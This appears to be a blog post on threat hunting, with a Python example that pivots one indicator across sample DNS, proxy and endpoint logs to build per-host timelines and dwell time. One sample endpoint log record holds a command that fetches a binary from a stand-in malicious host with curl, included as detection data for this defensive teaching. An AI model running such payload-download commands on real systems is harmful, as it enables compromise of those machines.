Threat hunting is when security professionals look for threats that are already in their organization’s IT environment. It is a process of proactively searching through networks in pursuit of attacks and evidence that attackers leave behind.
Proactive vs Reactive
In a nutshell, threat hunting is about taking a proactive rather than a reactive approach to identifying incidents.
A reactive approach involves responding to incidents that have already happened: the organization's incident response team is notified of an alert and responds to it.
A proactive approach involves preemptively identifying and addressing security weaknesses and threats before an attack takes place: the incident response team actively searches for malicious activity based on experience, the pattern of events, or simply hunches.
Building a threat hunting capability
Before starting a hunt, make sure you have the processes in place to respond efficiently. That is, make sure your team has effective responses prepared and can execute the mitigation, remediation, and recovery phases effectively.
Generating a Hunting Hypothesis
To generate a hypothesis you need to start by asking questions, such as "What is a vital company asset?" and "How would someone try to access it?" In a previous post, we explained how to generate a hunting hypothesis in detail. Starting from a hypothesis leads to a more focused and effective threat hunt.
The diverse scope of Data
A good hunt team should be able to use a basic indicator in various ways while hunting: pivoting from it into DNS, proxy, and endpoint telemetry, and deriving related indicators from what it finds. The more approaches a team has for aggregating data, the better its chances of finding a threat. Successful hunt teams have a multitude of technologies available to identify different types of activity in different ways.
Scalability & Automation
The most important aspect of hunting is proving a true negative, in other words, proving that nothing bad exists. However, it is impossible to be completely sure you are digging deep enough.
To address this problem, you need to hunt efficiently and widely, which requires a combination of scalability and automation. Automation can apply the same strategies and tactics a human hunter uses, but across every host and data source. Through automation, you can scale up threat hunting so that a vast number of events are examined in a fraction of the time required by humans.
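As an added illustration of the two points above (using one indicator in several ways, and automating the pivot so it covers every host and source), the script below is example code written for this post, not tooling from the original article. It assumes three constructed log sources (DNS, proxy, endpoint) held as Python lists, a hypothetical seed indicator `updates.example-bad.test`, and a hypothetical SOC detection time; all log records and hostnames are constructed sample data. The hunt expands the seed domain to the IP it resolved to, pivots both indicators across all three sources, merges the hits per host, and computes dwell time from the earliest evidence to the detection time.

```python
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Set, Tuple

# Constructed sample data (NOT real logs). Hostnames, domain and IP are hypothetical.
INDICATOR = "updates.example-bad.test"  # hypothetical seed indicator for the hunt

DNS_LOGS = [
    {"ts": "2024-03-01T08:02:10", "host": "ws-17", "query": "updates.example-bad.test", "answer": "203.0.113.7"},
    {"ts": "2024-03-01T08:02:11", "host": "ws-17", "query": "www.example.com", "answer": "93.184.216.34"},
    {"ts": "2024-03-03T14:20:05", "host": "ws-42", "query": "updates.example-bad.test", "answer": "203.0.113.7"},
]
PROXY_LOGS = [
    {"ts": "2024-03-01T08:02:12", "host": "ws-17", "dest": "updates.example-bad.test", "bytes_out": 1200},
    # ws-23 contacted the IP directly, so a DNS-only hunt would miss it.
    {"ts": "2024-03-02T09:15:00", "host": "ws-23", "dest": "203.0.113.7", "bytes_out": 90000},
]
ENDPOINT_LOGS = [
    {"ts": "2024-03-01T08:01:55", "host": "ws-17", "process": "curl.exe",
     "cmdline": "curl http://updates.example-bad.test/agent.bin -o agent.bin"},
]

Event = Tuple[datetime, str, str]  # (timestamp, source, detail)


def parse_ts(value: str) -> datetime:
    return datetime.fromisoformat(value)


def pivot(indicator: str) -> Dict[str, Set[Event]]:
    """Look for one indicator in the field where each source would carry it.

    Returns host -> set of (timestamp, source, detail). A set is used so the same
    record is not counted twice when several indicators match it.
    """
    hits: Dict[str, Set[Event]] = defaultdict(set)
    for rec in DNS_LOGS:
        if indicator in (rec["query"], rec["answer"]):
            hits[rec["host"]].add((parse_ts(rec["ts"]), "dns", f'{rec["query"]} -> {rec["answer"]}'))
    for rec in PROXY_LOGS:
        if rec["dest"] == indicator:
            hits[rec["host"]].add((parse_ts(rec["ts"]), "proxy", f'{rec["dest"]} ({rec["bytes_out"]} bytes out)'))
    for rec in ENDPOINT_LOGS:
        if indicator in rec["cmdline"]:
            hits[rec["host"]].add((parse_ts(rec["ts"]), "endpoint", f'{rec["process"]}: {rec["cmdline"]}'))
    return dict(hits)


def expand_indicators(indicator: str) -> Set[str]:
    """Derive related indicators: every IP the seed domain resolved to in DNS logs."""
    related = {indicator}
    for rec in DNS_LOGS:
        if rec["query"] == indicator:
            related.add(rec["answer"])
    return related


def hunt(indicator: str) -> Dict[str, List[Event]]:
    """Pivot on the seed and its derived indicators, merge per host, sort by time."""
    merged: Dict[str, Set[Event]] = defaultdict(set)
    for ind in expand_indicators(indicator):
        for host, events in pivot(ind).items():
            merged[host] |= events
    return {host: sorted(events) for host, events in merged.items()}


def dwell_time_seconds(hits: Dict[str, List[Event]], detection_ts: str) -> float:
    """Seconds from the earliest evidence in any source to the time the SOC detected it."""
    earliest = min(ev[0] for events in hits.values() for ev in events)
    return (parse_ts(detection_ts) - earliest).total_seconds()


if __name__ == "__main__":
    results = hunt(INDICATOR)
    for host, events in sorted(results.items()):
        print(host)
        for ts, source, detail in events:
            print(f"  {ts.isoformat()}  {source:8s}  {detail}")
    # Hypothetical detection time: when the first alert reached the SOC.
    print("dwell time (s):", dwell_time_seconds(results, "2024-03-03T15:00:00"))
```

Run the module directly to see the per-host timeline; `ws-23` only appears because the domain was expanded to its resolved IP, and `ws-17`'s earliest evidence is the endpoint record that predates its DNS query, which is exactly the kind of cross-source ordering a single-source query cannot reveal. Replacing the three lists with queries against a SIEM or EDR API is the only change needed to run the same pivot at scale.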
Beginning a hunt
To conduct a threat hunting exercise, you first need to decide whether to use an internal security team or an external threat hunting service provider. Your threat hunting team should start by evaluating internal projects and resources to determine which are most valuable, and then begin hunting.
The Benefits of Threat Hunting
Many companies are still struggling to establish a threat hunting program; those who have succeeded, however, have reported significant benefits, measured in areas such as:
- Speed and accuracy of response
- Attack surface exposure (hardened network and endpoints)
- Reduced dwell time (from infection to detection)
- Time to containment (detecting or preventing spread and lateral movement)
- Number of actual breaches relative to the number of incidents detected
- Exposure to external threats
- Resources (e.g., staff hours, expenses) spent on response
- Reduced frequency and number of malware infections